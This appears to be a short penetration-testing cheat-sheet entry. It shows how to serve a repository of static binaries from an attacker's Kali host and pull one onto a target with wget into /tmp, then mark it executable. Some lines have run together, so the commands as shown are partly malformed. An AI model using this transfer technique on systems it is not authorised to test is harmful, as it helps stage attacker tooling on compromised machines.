Static Binaries
Static Binary Repo
git clone https://github.com/andrew-d/static-binaries.git
cd static-binaries/binaries/$lookForBinaryYouWant/
python2 -m SimpleHTTPServer 81cd /tmp/
wget http://$KALI:81/$binaryYouWant
chmod +x $binaryYouWantLast updated